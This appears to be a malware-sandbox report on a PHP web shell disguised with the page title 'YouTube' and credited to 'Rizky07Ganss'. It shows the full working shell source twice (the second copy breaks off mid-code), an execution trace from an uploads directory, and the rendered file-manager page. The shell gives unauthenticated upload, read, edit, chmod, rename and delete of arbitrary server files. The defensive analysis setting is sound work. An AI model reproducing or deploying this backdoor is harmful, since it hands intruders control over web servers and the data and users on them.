Jump to:
Screenshot
Attributes
Environment
<?php
set_time_limit(0);
error_reporting(0);
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
echo "<!DOCTYPE HTML>\r\n<HTML>\r\n<HEAD>\r\n<link href=\"\" rel=\"stylesheet\" type=\"text/css\">\r\n<title>YouTube</title>\r\n<style>\r\nbody{\r\nfont-family: \"console\", cursive;\r\nbackground-color: #ffffff;\r\ntext-shadow:0px 0px 1px #ffffff;\r\n}\r\n#content tr:hover{\r\nbackground-color: #000000;\r\ntext-shadow:0px 0px 10px #ffffff;\r\n}\r\n#content .first{\r\nbackground-color: black;\r\n}\r\n#content .first:hover{\r\nbackground-color: black;\r\ntext-shadow:0px 0px 1px #000000;\r\n}\r\ntable{\r\nborder: 5px #000000 dotted;\r\n}\r\nH1{\r\nfont-family: \"Rye\", cursive;\r\n}\r\na{\r\ncolor: #000000;\r\ntext-decoration: none;\r\n}\r\na:hover{\r\ncolor: #fff;\r\ntext-shadow:0px 0px 10px #ffffff;\r\n}\r\ninput,select,textarea{\r\nborder: 2px #000000 solid;\r\n-moz-border-radius: 5px;\r\n-webkit-border-radius:5px;\r\nborder-radius:5px;\r\n}\r\nbody{\r\n}\r\n.h1,h2,h3,h4,h5,h6 {\r\n color: #20B2AA;\r\n size: 89px;\r\n}\r\n@font-face {\r\n font-family: opal;\r\n src: url(https://watchdogsfont.com/font/HACKED_Title.ttf);\r\n}\r\n</style>\r\n</HEAD>\r\n<BODY>\r\n<H1><center><font color=red face=opal>RIZKY07 GANSS</center></H1></font>\r\n<body class=\" pace-done\" bgcolor=\"Black\"><div class=\"pace pace-inactive\"><div class=\"pace-progress\" data-progress-text=\"100%\" data-progress=\"99\" style=\"width: 100%;\">\r\n<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr><td>Current Path : ";
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<a href=\"?path=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a href=\"?path=";
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo "</td></tr><tr><td>";
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo "<font color=\"green\">Upload File Berhasil</font><br />";
} else {
echo "<font color=\"red\">Upload File Gagal</font><br />";
}
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\">\r\nUpload File : <input type=\"file\" name=\"file\" />\r\n<input type=\"submit\" value=\"upload\" />\r\n</form>\r\n</td></tr>";
if (isset($_GET['filesrc'])) {
echo "<tr><td>Current File : ";
echo $_GET['filesrc'];
echo "</tr></td></table><br />";
echo '<pre>' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre>';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
if (chmod($_POST['path'], $_POST['perm'])) {
echo "<font color=\"green\">Mengubah Permission Berhasil</font><br />";
} else {
echo "<font color=\"red\">Mengubah Pemission Gagal</font><br />";
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo "<font color=\"green\">Ganti Nama Berhasil</font><br />";
} else {
echo "<font color=\"red\">Ganti Nama Gagal</font><br />";
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo "<font color=\"green\">Edit File Berhasil</font><br />";
} else {
echo "<font color=\"red\">Edit File Gagal</font><br />";
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=80 rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>';
}
echo "</center>";
} else {
echo "</table><br /><center>";
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo "<font color=\"green\">Menghapus Directory Berhasil</font><br />";
} else {
echo "<font color=\"red\">Menghapus Directory Gagal</font><br />";
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo "<font color=\"green\">Delete File Done.</font><br />";
} else {
echo "<font color=\"red\">Delete File Error.</font><br />";
}
}
}
echo "</center>";
$scandir = scandir($path);
echo "<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr class=\"first\">\r\n<td><center>Name</center></td>\r\n<td><center>Size</center></td>\r\n<td><center>Permissions</center></td>\r\n<td><center>Options</center></td>\r\n</tr>";
foreach ($scandir as $dir) {
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "<tr>\r\n<td><a href=\"?path={$path}/{$dir}\">{$dir}</a></td>\r\n<td><center>--</center></td>\r\n<td><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"Blue\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path={$path}\">\r\n<select name=\"opt\">\r\n<option value=\"\"></option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\r\n<input type=\"submit\" value=\"Oke\" />\r\n</form></center></td>\r\n</tr>";
}
echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
foreach ($scandir as $file) {
if (!is_file("{$path}/{$file}")) {
continue;
}
$size = filesize("{$path}/{$file}") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size .= ' KB';
}
echo "<tr>\r\n<td><a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\r\n<td><center>" . $size . "</center></td>\r\n<td><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"Blue\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path={$path}\">\r\n<select name=\"opt\">\r\n<option value=\"\"></option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n<option value=\"edit\">Edit</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"file\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$file}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\r\n<input type=\"submit\" value=\"Oke\" />\r\n</form></center></td>\r\n</tr>";
}
echo "</table>\r\n</div>";
}
echo "<center><br/><font color=red face=opal>Recoded By Rizky07Ganss</font><center>\r\n</BODY>\r\n</HTML>";
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xc000) == 0xc000) {
// Socket
$info = 's';
} elseif (($perms & 0xa000) == 0xa000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
// Group
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
// World
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $info;
}
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:43:59.158096]
1 0 1 0.000157 393464
1 3 0 0.000446 445880 {main} 1 /var/www/html/uploads/1.php 0 0
2 4 0 0.000463 445880 set_time_limit 0 /var/www/html/uploads/1.php 2 1 0
2 4 1 0.000480 445944
2 4 R FALSE
2 5 0 0.000494 445912 error_reporting 0 /var/www/html/uploads/1.php 3 1 0
2 5 1 0.000507 445952
2 5 R 22527
2 6 0 0.000519 445912 get_magic_quotes_gpc 0 /var/www/html/uploads/1.php 5 0
2 6 1 0.000531 445912
2 6 R FALSE
2 7 0 0.000546 445912 getcwd 0 /var/www/html/uploads/1.php 72 0
2 7 1 0.000559 445960
2 7 R '/var/www/html/uploads'
1 A /var/www/html/uploads/1.php 72 $path = '/var/www/html/uploads'
2 8 0 0.000587 445960 str_replace 0 /var/www/html/uploads/1.php 74 3 '\\' '/' '/var/www/html/uploads'
2 8 1 0.000601 446056
2 8 R '/var/www/html/uploads'
1 A /var/www/html/uploads/1.php 74 $path = '/var/www/html/uploads'
2 9 0 0.000625 445960 explode 0 /var/www/html/uploads/1.php 75 2 '/' '/var/www/html/uploads'
2 9 1 0.000638 446536
2 9 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/1.php 75 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/1.php 77 $id = 0
1 A /var/www/html/uploads/1.php 79 $a = TRUE
1 A /var/www/html/uploads/1.php 77 $id = 1
1 A /var/www/html/uploads/1.php 85 $i = 0
1 A /var/www/html/uploads/1.php 85 $i++
1 A /var/www/html/uploads/1.php 85 $i++
1 A /var/www/html/uploads/1.php 77 $id = 2
1 A /var/www/html/uploads/1.php 85 $i = 0
1 A /var/www/html/uploads/1.php 85 $i++
1 A /var/www/html/uploads/1.php 85 $i++
1 A /var/www/html/uploads/1.php 85 $i++
1 A /var/www/html/uploads/1.php 77 $id = 3
1 A /var/www/html/uploads/1.php 85 $i = 0
1 A /var/www/html/uploads/1.php 85 $i++
1 A /var/www/html/uploads/1.php 85 $i++
1 A /var/www/html/uploads/1.php 85 $i++
1 A /var/www/html/uploads/1.php 85 $i++
1 A /var/www/html/uploads/1.php 77 $id = 4
1 A /var/www/html/uploads/1.php 85 $i = 0
1 A /var/www/html/uploads/1.php 85 $i++
1 A /var/www/html/uploads/1.php 85 $i++
1 A /var/www/html/uploads/1.php 85 $i++
1 A /var/www/html/uploads/1.php 85 $i++
1 A /var/www/html/uploads/1.php 85 $i++
2 10 0 0.000868 446464 scandir 0 /var/www/html/uploads/1.php 176 1 '/var/www/html/uploads'
2 10 1 0.000901 447080
2 10 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
1 A /var/www/html/uploads/1.php 176 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
2 11 0 0.000983 447096 is_dir 0 /var/www/html/uploads/1.php 186 1 '/var/www/html/uploads/.'
2 11 1 0.001000 447160
2 11 R TRUE
2 12 0 0.001014 447128 is_dir 0 /var/www/html/uploads/1.php 186 1 '/var/www/html/uploads/..'
2 12 1 0.001029 447176
2 12 R TRUE
2 13 0 0.001042 447136 is_dir 0 /var/www/html/uploads/1.php 186 1 '/var/www/html/uploads/.htaccess'
2 13 1 0.001056 447176
2 13 R FALSE
2 14 0 0.001070 447136 is_dir 0 /var/www/html/uploads/1.php 186 1 '/var/www/html/uploads/1.php'
2 14 1 0.001083 447176
2 14 R FALSE
2 15 0 0.001095 447136 is_dir 0 /var/www/html/uploads/1.php 186 1 '/var/www/html/uploads/data'
2 15 1 0.001109 447176
2 15 R TRUE
2 16 0 0.001133 447136 is_writable 0 /var/www/html/uploads/1.php 191 1 '/var/www/html/uploads/data'
2 16 1 0.001151 447176
2 16 R TRUE
2 17 0 0.001166 447136 perms 1 /var/www/html/uploads/1.php 193 1 '/var/www/html/uploads/data'
3 18 0 0.001178 447136 fileperms 0 /var/www/html/uploads/1.php 253 1 '/var/www/html/uploads/data'
3 18 1 0.001190 447176
3 18 R 16895
2 A /var/www/html/uploads/1.php 253 $perms = 16895
2 A /var/www/html/uploads/1.php 269 $info = 'd'
2 A /var/www/html/uploads/1.php 282 $info .= 'r'
2 A /var/www/html/uploads/1.php 283 $info .= 'w'
2 A /var/www/html/uploads/1.php 286 $info .= 'x'
2 A /var/www/html/uploads/1.php 289 $info .= 'r'
2 A /var/www/html/uploads/1.php 290 $info .= 'w'
2 A /var/www/html/uploads/1.php 293 $info .= 'x'
2 A /var/www/html/uploads/1.php 296 $info .= 'r'
2 A /var/www/html/uploads/1.php 297 $info .= 'w'
2 A /var/www/html/uploads/1.php 300 $info .= 'x'
2 17 1 0.001319 447176
2 17 R 'drwxrwxrwx'
2 19 0 0.001333 447136 is_writable 0 /var/www/html/uploads/1.php 194 1 '/var/www/html/uploads/data'
2 19 1 0.001349 447176
2 19 R TRUE
2 20 0 0.001364 447144 is_dir 0 /var/www/html/uploads/1.php 186 1 '/var/www/html/uploads/prepend.php'
2 20 1 0.001380 447192
2 20 R FALSE
2 21 0 0.001394 447136 is_file 0 /var/www/html/uploads/1.php 213 1 '/var/www/html/uploads/.'
2 21 1 0.001408 447160
2 21 R FALSE
2 22 0 0.001421 447128 is_file 0 /var/www/html/uploads/1.php 213 1 '/var/www/html/uploads/..'
2 22 1 0.001435 447176
2 22 R FALSE
2 23 0 0.001447 447136 is_file 0 /var/www/html/uploads/1.php 213 1 '/var/www/html/uploads/.htaccess'
2 23 1 0.001462 447176
2 23 R TRUE
2 24 0 0.001474 447136 filesize 0 /var/www/html/uploads/1.php 214 1 '/var/www/html/uploads/.htaccess'
2 24 1 0.001487 447176
2 24 R 64
1 A /var/www/html/uploads/1.php 214 $size = 0.0625
2 25 0 0.001510 447080 round 0 /var/www/html/uploads/1.php 215 2 0.0625 3
2 25 1 0.001524 447152
2 25 R 0.063
1 A /var/www/html/uploads/1.php 215 $size = 0.063
1 A /var/www/html/uploads/1.php 219 $size = '0.063 KB'
2 26 0 0.001561 447176 is_writable 0 /var/www/html/uploads/1.php 226 1 '/var/www/html/uploads/.htaccess'
2 26 1 0.001576 447216
2 26 R FALSE
2 27 0 0.001590 447176 is_readable 0 /var/www/html/uploads/1.php 227 1 '/var/www/html/uploads/.htaccess'
2 27 1 0.001604 447216
2 27 R TRUE
2 28 0 0.001617 447176 perms 1 /var/www/html/uploads/1.php 228 1 '/var/www/html/uploads/.htaccess'
3 29 0 0.001630 447176 fileperms 0 /var/www/html/uploads/1.php 253 1 '/var/www/html/uploads/.htaccess'
3 29 1 0.001642 447216
3 29 R 33188
2 A /var/www/html/uploads/1.php 253 $perms = 33188
2 A /var/www/html/uploads/1.php 263 $info = '-'
2 A /var/www/html/uploads/1.php 282 $info .= 'r'
2 A /var/www/html/uploads/1.php 283 $info .= 'w'
2 A /var/www/html/uploads/1.php 286 $info .= '-'
2 A /var/www/html/uploads/1.php 289 $info .= 'r'
2 A /var/www/html/uploads/1.php 290 $info .= '-'
2 A /var/www/html/uploads/1.php 293 $info .= '-'
2 A /var/www/html/uploads/1.php 296 $info .= 'r'
2 A /var/www/html/uploads/1.php 297 $info .= '-'
2 A /var/www/html/uploads/1.php 300 $info .= '-'
2 28 1 0.001757 447216
2 28 R '-rw-r--r--'
2 30 0 0.001771 447176 is_writable 0 /var/www/html/uploads/1.php 229 1 '/var/www/html/uploads/.htaccess'
2 30 1 0.001789 447216
2 30 R FALSE
2 31 0 0.001802 447176 is_readable 0 /var/www/html/uploads/1.php 229 1 '/var/www/html/uploads/.htaccess'
2 31 1 0.001862 447216
2 31 R TRUE
2 32 0 0.001877 447176 is_file 0 /var/www/html/uploads/1.php 213 1 '/var/www/html/uploads/1.php'
2 32 1 0.001891 447216
2 32 R TRUE
2 33 0 0.001904 447176 filesize 0 /var/www/html/uploads/1.php 214 1 '/var/www/html/uploads/1.php'
2 33 1 0.001916 447216
2 33 R 8698
1 A /var/www/html/uploads/1.php 214 $size = 8.494140625
2 34 0 0.001940 447080 round 0 /var/www/html/uploads/1.php 215 2 8.494140625 3
2 34 1 0.001953 447152
2 34 R 8.494
1 A /var/www/html/uploads/1.php 215 $size = 8.494
1 A /var/www/html/uploads/1.php 219 $size = '8.494 KB'
2 35 0 0.001988 447176 is_writable 0 /var/www/html/uploads/1.php 226 1 '/var/www/html/uploads/1.php'
2 35 1 0.002003 447216
2 35 R FALSE
2 36 0 0.002016 447176 is_readable 0 /var/www/html/uploads/1.php 227 1 '/var/www/html/uploads/1.php'
2 36 1 0.002030 447216
2 36 R TRUE
2 37 0 0.002043 447176 perms 1 /var/www/html/uploads/1.php 228 1 '/var/www/html/uploads/1.php'
3 38 0 0.002055 447176 fileperms 0 /var/www/html/uploads/1.php 253 1 '/var/www/html/uploads/1.php'
3 38 1 0.002067 447216
3 38 R 33204
2 A /var/www/html/uploads/1.php 253 $perms = 33204
2 A /var/www/html/uploads/1.php 263 $info = '-'
2 A /var/www/html/uploads/1.php 282 $info .= 'r'
2 A /var/www/html/uploads/1.php 283 $info .= 'w'
2 A /var/www/html/uploads/1.php 286 $info .= '-'
2 A /var/www/html/uploads/1.php 289 $info .= 'r'
2 A /var/www/html/uploads/1.php 290 $info .= 'w'
2 A /var/www/html/uploads/1.php 293 $info .= '-'
2 A /var/www/html/uploads/1.php 296 $info .= 'r'
2 A /var/www/html/uploads/1.php 297 $info .= '-'
2 A /var/www/html/uploads/1.php 300 $info .= '-'
2 37 1 0.002188 447216
2 37 R '-rw-rw-r--'
2 39 0 0.002202 447176 is_writable 0 /var/www/html/uploads/1.php 229 1 '/var/www/html/uploads/1.php'
2 39 1 0.002216 447216
2 39 R FALSE
2 40 0 0.002230 447176 is_readable 0 /var/www/html/uploads/1.php 229 1 '/var/www/html/uploads/1.php'
2 40 1 0.002244 447216
2 40 R TRUE
2 41 0 0.002258 447176 is_file 0 /var/www/html/uploads/1.php 213 1 '/var/www/html/uploads/data'
2 41 1 0.002272 447216
2 41 R FALSE
2 42 0 0.002285 447184 is_file 0 /var/www/html/uploads/1.php 213 1 '/var/www/html/uploads/prepend.php'
2 42 1 0.002299 447232
2 42 R TRUE
2 43 0 0.002312 447192 filesize 0 /var/www/html/uploads/1.php 214 1 '/var/www/html/uploads/prepend.php'
2 43 1 0.002325 447232
2 43 R 57
1 A /var/www/html/uploads/1.php 214 $size = 0.0556640625
2 44 0 0.002348 447088 round 0 /var/www/html/uploads/1.php 215 2 0.0556640625 3
2 44 1 0.002361 447160
2 44 R 0.056
1 A /var/www/html/uploads/1.php 215 $size = 0.056
1 A /var/www/html/uploads/1.php 219 $size = '0.056 KB'
2 45 0 0.002409 447304 is_writable 0 /var/www/html/uploads/1.php 226 1 '/var/www/html/uploads/prepend.php'
2 45 1 0.002426 447344
2 45 R FALSE
2 46 0 0.002439 447304 is_readable 0 /var/www/html/uploads/1.php 227 1 '/var/www/html/uploads/prepend.php'
2 46 1 0.002453 447344
2 46 R TRUE
2 47 0 0.002466 447304 perms 1 /var/www/html/uploads/1.php 228 1 '/var/www/html/uploads/prepend.php'
3 48 0 0.002479 447304 fileperms 0 /var/www/html/uploads/1.php 253 1 '/var/www/html/uploads/prepend.php'
3 48 1 0.002493 447344
3 48 R 33261
2 A /var/www/html/uploads/1.php 253 $perms = 33261
2 A /var/www/html/uploads/1.php 263 $info = '-'
2 A /var/www/html/uploads/1.php 282 $info .= 'r'
2 A /var/www/html/uploads/1.php 283 $info .= 'w'
2 A /var/www/html/uploads/1.php 286 $info .= 'x'
2 A /var/www/html/uploads/1.php 289 $info .= 'r'
2 A /var/www/html/uploads/1.php 290 $info .= '-'
2 A /var/www/html/uploads/1.php 293 $info .= 'x'
2 A /var/www/html/uploads/1.php 296 $info .= 'r'
2 A /var/www/html/uploads/1.php 297 $info .= '-'
2 A /var/www/html/uploads/1.php 300 $info .= 'x'
2 47 1 0.002610 447344
2 47 R '-rwxr-xr-x'
2 49 0 0.002624 447304 is_writable 0 /var/www/html/uploads/1.php 229 1 '/var/www/html/uploads/prepend.php'
2 49 1 0.002639 447344
2 49 R FALSE
2 50 0 0.002652 447304 is_readable 0 /var/www/html/uploads/1.php 229 1 '/var/www/html/uploads/prepend.php'
2 50 1 0.002667 447344
2 50 R TRUE
1 3 1 0.002683 447240
0.002732 326160
TRACE END [2023-02-12 21:43:59.160703]
<html><head>
<link href="" rel="stylesheet" type="text/css">
<title>YouTube</title>
<style>
body{
font-family: "console", cursive;
background-color: #ffffff;
text-shadow:0px 0px 1px #ffffff;
}
#content tr:hover{
background-color: #000000;
text-shadow:0px 0px 10px #ffffff;
}
#content .first{
background-color: black;
}
#content .first:hover{
background-color: black;
text-shadow:0px 0px 1px #000000;
}
table{
border: 5px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: #000000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 2px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
body{
}
.h1,h2,h3,h4,h5,h6 {
color: #20B2AA;
size: 89px;
}
@font-face {
font-family: opal;
src: url(https://watchdogsfont.com/font/HACKED_Title.ttf);
}
</style>
</head>
<body class=" pace-done" bgcolor="Black">
<h1><center><font color="red" face="opal">RIZKY07 GANSS</font></center></h1>
<div class="pace pace-inactive"><div class="pace-progress" data-progress-text="100%" data-progress="99" style="width: 100%;">
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr><td>Current Path : <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file">
<input type="submit" value="upload">
</form>
</td></tr></tbody></table><br><center></center><div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr><tr class="first"><td></td><td></td><td></td><td></td></tr><tr>
<td><a href="?filesrc=/var/www/html/1.php&path=/var/www/html">1.php</a></td>
<td><center>8.494 KB</center></td>
<td><center>-rw-rw-r--</center></td>
<td><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt">
<option value=""></option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="1.php">
<input type="hidden" name="path" value="/var/www/html/1.php">
<input type="submit" value="Oke">
</form></center></td>
</tr><tr>
<td><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td>
<td><center>0 KB</center></td>
<td><center>-rw-r--r--</center></td>
<td><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt">
<option value=""></option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input type="submit" value="Oke">
</form></center></td>
</tr></tbody></table>
</div><center><br><font color="red" face="opal">Recoded By Rizky07Ganss</font><center>
</center></center></div></div></body></html>
<?php
set_time_limit(0);
error_reporting(0);
if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>YouTube</title>
<style>
body{
font-family: "console", cursive;
background-color: #ffffff;
text-shadow:0px 0px 1px #ffffff;
}
#content tr:hover{
background-color: #000000;
text-shadow:0px 0px 10px #ffffff;
}
#content .first{
background-color: black;
}
#content .first:hover{
background-color: black;
text-shadow:0px 0px 1px #000000;
}
table{
border: 5px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: #000000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 2px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
body{
}
.h1,h2,h3,h4,h5,h6 {
color: #20B2AA;
size: 89px;
}
@font-face {
font-family: opal;
src: url(https://watchdogsfont.com/font/HACKED_Title.ttf);
}
</style>
</HEAD>
<BODY>
<H1><center><font color=red face=opal>RIZKY07 GANSS</center></H1></font>
<body class=" pace-done" bgcolor="Black"><div class="pace pace-inactive"><div class="pace-progress" data-progress-text="100%" data-progress="99" style="width: 100%;">
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Current Path : ';
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '<font color="green">Upload File Berhasil</font><br />';
}else{
echo '<font color="red">Upload File Gagal</font><br />';
}
}
echo '<form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</td></tr>';
if(isset($_GET['filesrc'])){
echo "<tr><td>Current File : ";
echo $_GET['filesrc'];
echo '</tr></td></table><br />';
echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '<font color="green">Mengubah Permission Berhasil</font><br />';
}else{
echo '<font color="red">Mengubah Pemission Gagal</font><br />';
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
}elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '<font color="green">Ganti Nama Berhasil</font><br />';
}else{
echo '<font color="red">Ganti Nama Gagal</font><br />';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
}elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '<font color="green">Edit File Berhasil</font><br />';
}else{
echo '<font color="red">Edit File Gagal</font><br />';
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>';
}
echo '</center>';
}else{
echo '</table><br /><center>';
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '<font color="green">Menghapus Directory Berhasil</font><br />';
}else{
echo '<font color="red">Menghapus Directory Gagal</font><br />';
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '<font color="green">Delete File Done.</font><br />';
}else{
echo '<font color="red">Delete File Error.</font><br />';
}
}
}
echo '</center>';
$scandir = scandir($path);
echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
